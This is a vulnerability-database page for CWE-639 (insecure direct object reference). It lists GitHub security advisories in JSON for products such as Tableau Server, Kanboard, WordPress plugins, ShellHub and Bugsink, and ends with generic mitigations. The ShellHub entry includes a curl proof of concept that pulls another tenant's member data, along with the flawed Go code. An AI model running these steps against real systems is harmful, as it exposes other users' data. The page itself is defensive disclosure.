CWE-639
AllowedAuthorization Bypass Through User-Controlled Key
Abstraction: Base · Status: Incomplete
The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
3234 vulnerabilities reference this CWE, most recent first.
GHSA-VV7W-FWVC-GWHJ
Vulnerability from github – Published: 2025-07-25 21:33 – Updated: 2025-07-25 21:33Authorization Bypass Through User-Controlled Key vulnerability in Salesforce Tableau Server on Windows, Linux (validate-initial-sql api modules) allows Interface Manipulation (data access to the production database cluster). This issue affects Tableau Server: before 2025.1.3, before 2024.2.12, before 2023.3.19.
{
"affected": [],
"aliases": [
"CVE-2025-52448"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-25T19:15:40Z",
"severity": "HIGH"
},
"details": "Authorization Bypass Through User-Controlled Key vulnerability in Salesforce Tableau Server on Windows, Linux (validate-initial-sql api modules) allows Interface Manipulation (data access to the production database cluster). This issue affects Tableau Server: before 2025.1.3, before 2024.2.12, before 2023.3.19.",
"id": "GHSA-vv7w-fwvc-gwhj",
"modified": "2025-07-25T21:33:50Z",
"published": "2025-07-25T21:33:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52448"
},
{
"type": "WEB",
"url": "https://help.salesforce.com/s/articleView?id=005105043\u0026type=1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VVJM-MJQ4-27C8
Vulnerability from github – Published: 2026-06-25 21:31 – Updated: 2026-06-25 21:31Kanboard through 1.2.52, fixed in commit 928c68a, UserViewController::removeSession fails to validate the session id parameter before passing it to RememberMeSessionModel::remove, allowing authenticated users to delete other users' Remember Me sessions. Attackers can enumerate sequential session IDs and mass-invalidate persistent login sessions of any user, including administrators, forcing re-authentication and causing denial of service.
{
"affected": [],
"aliases": [
"CVE-2026-56774"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-25T19:16:44Z",
"severity": "MODERATE"
},
"details": "Kanboard through 1.2.52, fixed in commit 928c68a, UserViewController::removeSession fails to validate the session id parameter before passing it to RememberMeSessionModel::remove, allowing authenticated users to delete other users\u0027 Remember Me sessions. Attackers can enumerate sequential session IDs and mass-invalidate persistent login sessions of any user, including administrators, forcing re-authentication and causing denial of service.",
"id": "GHSA-vvjm-mjq4-27c8",
"modified": "2026-06-25T21:31:30Z",
"published": "2026-06-25T21:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56774"
},
{
"type": "WEB",
"url": "https://github.com/kanboard/kanboard/issues/5829"
},
{
"type": "WEB",
"url": "https://github.com/kanboard/kanboard/pull/5831"
},
{
"type": "WEB",
"url": "https://github.com/kanboard/kanboard/commit/928c68aa2b7c00092dd71084d329b912e229f3d1"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/kanboard-cross-user-deletion-of-persistent-login-sessions-via-unvalidated-session-id"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-VVVQ-Q595-47G3
Vulnerability from github – Published: 2025-04-08 03:32 – Updated: 2025-04-08 03:32The Streamit theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.0.2. This is due to the plugin not properly validating a user's identity prior to updating their details like email in the 'st_Authentication_Controller::edit_profile' function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.
{
"affected": [],
"aliases": [
"CVE-2025-2526"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-08T02:15:20Z",
"severity": "HIGH"
},
"details": "The Streamit theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.0.2. This is due to the plugin not properly validating a user\u0027s identity prior to updating their details like email in the \u0027st_Authentication_Controller::edit_profile\u0027 function. This makes it possible for unauthenticated attackers to change arbitrary user\u0027s email addresses, including administrators, and leverage that to reset the user\u0027s password and gain access to their account.",
"id": "GHSA-vvvq-q595-47g3",
"modified": "2025-04-08T03:32:37Z",
"published": "2025-04-08T03:32:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2526"
},
{
"type": "WEB",
"url": "https://documentation.iqonic.design/streamit/change-log/streamit-v4-0"
},
{
"type": "WEB",
"url": "https://themeforest.net/item/streamit-video-streaming-wordpress-theme/29772881"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/057abffb-1c52-49ca-8791-ca44f0c5a011?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VW88-9F5H-6PX5
Vulnerability from github – Published: 2022-05-27 00:00 – Updated: 2022-06-11 00:00In oretnom23 Automotive Shop Management System v1.0, the name id parameter is vulnerable to IDOR - Broken Access Control allowing attackers to change the admin password(vertical privilege escalation)
{
"affected": [],
"aliases": [
"CVE-2022-30495"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-26T17:15:00Z",
"severity": "CRITICAL"
},
"details": "In oretnom23 Automotive Shop Management System v1.0, the name id parameter is vulnerable to IDOR - Broken Access Control allowing attackers to change the admin password(vertical privilege escalation)",
"id": "GHSA-vw88-9f5h-6px5",
"modified": "2022-06-11T00:00:32Z",
"published": "2022-05-27T00:00:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30495"
},
{
"type": "WEB",
"url": "https://github.com/nsparker1337/OpenSource/blob/main/exploit_idor_asms.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VWF8-XX3V-5QW7
Vulnerability from github – Published: 2026-06-13 12:31 – Updated: 2026-06-13 12:31The Meow Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the REST API endpoint /wp-json/meow-gallery/v1/save_shortcode in all versions up to, and including, 5.4.4 This makes it possible for authenticated attackers, with Author-level access and above, to arbitrarily create or overwrite existing gallery shortcode records by supplying a user-controlled id value. The endpoint performs database update operations without verifying that the requesting user is authorized to modify the referenced gallery record or create their own.
{
"affected": [],
"aliases": [
"CVE-2026-1291"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-13T10:16:18Z",
"severity": "MODERATE"
},
"details": "The Meow Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the REST API endpoint /wp-json/meow-gallery/v1/save_shortcode in all versions up to, and including, 5.4.4 This makes it possible for authenticated attackers, with Author-level access and above, to arbitrarily create or overwrite existing gallery shortcode records by supplying a user-controlled id value. The endpoint performs database update operations without verifying that the requesting user is authorized to modify the referenced gallery record or create their own.",
"id": "GHSA-vwf8-xx3v-5qw7",
"modified": "2026-06-13T12:31:25Z",
"published": "2026-06-13T12:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1291"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/meow-gallery/trunk/classes/rest.php"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3469543/meow-gallery"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3469543/meow-gallery/trunk/classes/rest.php"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fmeow-gallery/tags/5.4.4\u0026new_path=%2Fmeow-gallery/tags/5.4.5"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/meow-gallery"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3386ea07-9c61-4b54-a451-1178ca6325cb?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VWVX-F9WX-WJ6P
Vulnerability from github – Published: 2023-05-30 21:30 – Updated: 2024-04-04 04:23Shop Beat Solutions (Pty) LTD Shop Beat Media Player 2.5.95 up to 3.2.57 is vulnerable to IDOR via controlpanel.shopbeat.co.za.
{
"affected": [],
"aliases": [
"CVE-2022-36247"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-05-30T20:15:09Z",
"severity": "CRITICAL"
},
"details": "Shop Beat Solutions (Pty) LTD Shop Beat Media Player 2.5.95 up to 3.2.57 is vulnerable to IDOR via controlpanel.shopbeat.co.za.",
"id": "GHSA-vwvx-f9wx-wj6p",
"modified": "2024-04-04T04:23:40Z",
"published": "2023-05-30T21:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-36247"
},
{
"type": "WEB",
"url": "https://www.shopbeat.co.za"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VWX9-7QCF-GG7F
Vulnerability from github – Published: 2026-05-07 03:02 – Updated: 2026-05-14 20:43Summary
GET /api/namespaces/:tenant returns the full namespace object — including the members list (user IDs, e-mails, roles), settings, and device counts — to any caller authenticated by an API Key, for any tenant, regardless of the API Key's own tenant scope.
The handler conditionally skips the membership check when the user ID (X-ID) is absent, which is exactly the case for API Key authentication.
Affected versions
ShellHub Community v0.24.1 (validated).
Root cause
api/routes/nsadm.go:75-102 — membership check is skipped when c.ID() is nil:
```go var uid string if c.ID() != nil { uid = c.ID().ID }
ns, err := h.service.GetNamespace(c.Ctx(), req.Tenant) if err != nil || ns == nil { return c.NoContent(http.StatusNotFound) }
if uid != "" { // ⚠️ skipped when API Key is used if _, ok := ns.FindMember(uid); !ok { return c.NoContent(http.StatusForbidden) } }
return c.JSON(http.StatusOK, ns) ```
AuthRequest (api/routes/auth.go:53-64) sets only X-Tenant-ID, X-Role,
and X-API-KEY for API Key authentication — never X-ID. So
c.Request().Header.Get("X-ID") returns "", c.ID() returns nil, and
the membership check is bypassed.
Proof of concept (validated live against v0.24.1)
```bash # Attacker authenticates in their own namespace and mints an API Key ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"..."}' | jq -r .token)
ATTACKER_KEY=$(curl -s -X POST http://target/api/namespaces/api-key \ -H "Authorization: Bearer $ATTACKER_TOKEN" \ -H 'Content-Type: application/json' \ -d '{"name":"poc","expires_at":30}' | jq -r .id)
# Baseline: same request with JWT is correctly blocked curl -i http://target/api/namespaces/ \ -H "Authorization: Bearer $ATTACKER_TOKEN" # Observed: HTTP 403 (correct)
# Exploit: same request with API Key returns full namespace curl -i http://target/api/namespaces/ \ -H "X-API-Key: $ATTACKER_KEY" # Observed: HTTP 200 + {name, owner, tenant_id, members:[{id,email,role,added_at},...], # settings, max_devices, devices_accepted_count, type, created_at} ```
Impact
- Enumeration of any ShellHub namespace by tenant UUID.
- Disclosure of member e-mails, user IDs, and roles → user enumeration and targeted phishing against the victim organization.
- Disclosure of namespace settings (session recording on/off, announcement text), device counts, namespace type, owner identity.
Suggested fix
Two layers:
-
Primary — enforce caller-tenant match before returning the namespace, covering both JWT and API Key callers:
go // nsadm.go GetNamespace if c.Tenant() != nil && c.Tenant().ID != req.Tenant { return c.NoContent(http.StatusForbidden) }
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.24.1"
},
"package": {
"ecosystem": "Go",
"name": "github.com/shellhub-io/shellhub"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.24.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44426"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T03:02:28Z",
"nvd_published_at": "2026-05-13T22:16:44Z",
"severity": "MODERATE"
},
"details": "## Summary\n`GET /api/namespaces/:tenant` returns the full namespace object \u2014 including the members list (user IDs, e-mails, roles), settings, and device counts \u2014 to any caller authenticated by an **API Key**, for any tenant, regardless of the API Key\u0027s own tenant scope.\n\nThe handler conditionally skips the membership check when the user ID (`X-ID`) is absent, which is exactly the case for API Key authentication.\n\n## Affected versions\nShellHub Community v0.24.1 (validated).\n\n## Root cause\n`api/routes/nsadm.go:75-102` \u2014 membership check is skipped when `c.ID()` is nil:\n\n ```go\n var uid string\n if c.ID() != nil {\n uid = c.ID().ID\n }\n\n ns, err := h.service.GetNamespace(c.Ctx(), req.Tenant)\n if err != nil || ns == nil {\n return c.NoContent(http.StatusNotFound)\n }\n\n if uid != \"\" { // \u26a0\ufe0f skipped when API Key is used\n if _, ok := ns.FindMember(uid); !ok {\n return c.NoContent(http.StatusForbidden)\n }\n }\n\n return c.JSON(http.StatusOK, ns)\n ```\n\n `AuthRequest` (`api/routes/auth.go:53-64`) sets only `X-Tenant-ID`, `X-Role`,\n and `X-API-KEY` for API Key authentication \u2014 never `X-ID`. So\n `c.Request().Header.Get(\"X-ID\")` returns `\"\"`, `c.ID()` returns `nil`, and\n the membership check is bypassed.\n\n## Proof of concept (validated live against v0.24.1)\n\n ```bash\n # Attacker authenticates in their own namespace and mints an API Key\n ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"username\":\"attacker\",\"password\":\"...\"}\u0027 | jq -r .token)\n\n ATTACKER_KEY=$(curl -s -X POST http://target/api/namespaces/api-key \\\n -H \"Authorization: Bearer $ATTACKER_TOKEN\" \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"name\":\"poc\",\"expires_at\":30}\u0027 | jq -r .id)\n\n # Baseline: same request with JWT is correctly blocked\n curl -i http://target/api/namespaces/\u003cvictim-tenant-uuid\u003e \\\n -H \"Authorization: Bearer $ATTACKER_TOKEN\"\n # Observed: HTTP 403 (correct)\n\n # Exploit: same request with API Key returns full namespace\n curl -i http://target/api/namespaces/\u003cvictim-tenant-uuid\u003e \\\n -H \"X-API-Key: $ATTACKER_KEY\"\n # Observed: HTTP 200 + {name, owner, tenant_id, members:[{id,email,role,added_at},...],\n # settings, max_devices, devices_accepted_count, type, created_at}\n ```\n\n## Impact\n - Enumeration of any ShellHub namespace by tenant UUID.\n - Disclosure of member e-mails, user IDs, and roles \u2192 user enumeration and targeted phishing against the victim organization.\n - Disclosure of namespace settings (session recording on/off, announcement text), device counts, namespace type, owner identity.\n\n## Suggested fix\nTwo layers:\n\n 1. **Primary** \u2014 enforce caller-tenant match before returning the namespace, covering both JWT and API Key callers:\n\n ```go\n // nsadm.go GetNamespace\n if c.Tenant() != nil \u0026\u0026 c.Tenant().ID != req.Tenant {\n return c.NoContent(http.StatusForbidden)\n }\n ```",
"id": "GHSA-vwx9-7qcf-gg7f",
"modified": "2026-05-14T20:43:26Z",
"published": "2026-05-07T03:02:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-vwx9-7qcf-gg7f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44426"
},
{
"type": "PACKAGE",
"url": "https://github.com/shellhub-io/shellhub"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "ShellHub has cross-tenant IDOR in `GET /api/namespaces/:tenant` via API Key bypasses membership check"
}
GHSA-VX2F-6M6H-9FRF
Vulnerability from github – Published: 2026-06-05 21:43 – Updated: 2026-06-05 21:43Description
Bugsink issue event pages accept a direct event identifier from the URL and, in affected versions, look up that event without also requiring it to belong to the issue in the URL.
This is a project-boundary authorization issue: a logged-in user with access to one project can view another project’s event data through an issue they are allowed to access. However, the issue is mitigated by two factors. First, the attacker needs to already know a valid target event UUID; there is no event enumeration path here, and guessing UUIDs is not practical. Second, Bugsink is commonly self-hosted within a single trust domain, and Hosted Bugsink gives each tenant a separate Bugsink instance, so cross-project access does not normally imply cross-tenant access.
The affected views include the stacktrace, details, and breadcrumbs pages for an issue event.
This has been fixed by requiring direct event lookups to match both the authorized issue and the project.
Impact
Low-severity cross-project event data exposure, requiring authentication and prior knowledge of a valid event UUID.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "bugsink"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47715"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-05T21:43:23Z",
"nvd_published_at": "2026-05-26T17:16:52Z",
"severity": "LOW"
},
"details": "### Description\n\nBugsink issue event pages accept a direct event identifier from the URL and, in affected versions, look up that event without also requiring it to belong to the issue in the URL.\n\nThis is a project-boundary authorization issue: a logged-in user with access to one project can view another project\u2019s event data through an issue they are allowed to access. However, the issue is mitigated by two factors. First, the attacker needs to already know a valid target event UUID; there is no event enumeration path here, and guessing UUIDs is not practical. Second, Bugsink is commonly self-hosted within a single trust domain, and Hosted Bugsink gives each tenant a separate Bugsink instance, so cross-project access does not normally imply cross-tenant access.\n\nThe affected views include the stacktrace, details, and breadcrumbs pages for an issue event.\n\nThis has been fixed by requiring direct event lookups to match both the authorized issue and the project.\n\n### Impact\nLow-severity cross-project event data exposure, requiring authentication and prior knowledge of a valid event UUID.",
"id": "GHSA-vx2f-6m6h-9frf",
"modified": "2026-06-05T21:43:23Z",
"published": "2026-06-05T21:43:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/bugsink/bugsink/security/advisories/GHSA-vx2f-6m6h-9frf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47715"
},
{
"type": "PACKAGE",
"url": "https://github.com/bugsink/bugsink"
},
{
"type": "WEB",
"url": "https://github.com/bugsink/bugsink/releases/tag/2.2.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Bugsink: Issue event views can show an event from another project if its UUID is known"
}
GHSA-VXGR-VW7P-4H7X
Vulnerability from github – Published: 2025-02-20 12:31 – Updated: 2026-04-08 21:33The Prime Addons for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.1 via the pae_global_block shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract information from posts that are not public, including drafts, private, password protected, and restricted posts. This applies to posts created with Elementor only.
{
"affected": [],
"aliases": [
"CVE-2024-13855"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-20T10:15:11Z",
"severity": "MODERATE"
},
"details": "The Prime Addons for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.1 via the pae_global_block shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract information from posts that are not public, including drafts, private, password protected, and restricted posts. This applies to posts created with Elementor only.",
"id": "GHSA-vxgr-vw7p-4h7x",
"modified": "2026-04-08T21:33:02Z",
"published": "2025-02-20T12:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13855"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3244276/prime-addons-for-elementor/trunk/includes/global-blocks/class-global-blocks.php"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/prime-addons-for-elementor/#developers"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac5012f2-3518-41c0-befe-597008f22152?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VXRF-W6G3-6QR9
Vulnerability from github – Published: 2022-04-26 00:00 – Updated: 2022-05-05 00:00Non Privilege User can Enable or Disable Registered in GitHub repository openemr/openemr prior to 6.1.0.1.
{
"affected": [],
"aliases": [
"CVE-2022-1461"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-04-25T11:15:00Z",
"severity": "MODERATE"
},
"details": "Non Privilege User can Enable or Disable Registered in GitHub repository openemr/openemr prior to 6.1.0.1.",
"id": "GHSA-vxrf-w6g3-6qr9",
"modified": "2022-05-05T00:00:40Z",
"published": "2022-04-26T00:00:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1461"
},
{
"type": "WEB",
"url": "https://github.com/openemr/openemr/commit/3af1f4a28a8df0e446043232214ed08cc8e0889d"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/690a8ec5-64fc-4180-9f1f-c3c599bae0a9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.
Mitigation
Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.
Mitigation
Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.
No CAPEC attack patterns related to this CWE.